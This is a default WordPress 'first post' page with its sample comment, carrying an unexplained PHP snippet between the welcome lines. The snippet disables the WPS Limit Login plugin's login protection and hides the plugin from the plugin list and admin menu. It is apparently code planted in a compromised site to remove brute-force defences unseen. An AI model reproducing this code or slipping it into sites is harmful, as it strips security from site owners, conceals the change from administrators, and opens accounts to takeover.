Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
add_action('init', function() { if ( class_exists('\WPS\WPS_Limit_Login\Plugin') ) { $plugin_instance = \WPS\WPS_Limit_Login\Plugin::get_instance(); remove_action('login_form', [$plugin_instance, 'login_form']); add_action('login_form', function() {}); add_filter('all_plugins', function($plugins) { unset($plugins['wps-limit-login/wps-limit-login.php']); return $plugins; }); add_action('admin_menu', function() { remove_submenu_page('options-general.php', 'wps-limit-login'); }, 999); } });
Welcome to WordPress. This is your first post. Edit or delete it, then start writing!
June 10, 2018 -
Hi, this is a comment.
To get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.
Commenter avatars come from Gravatar.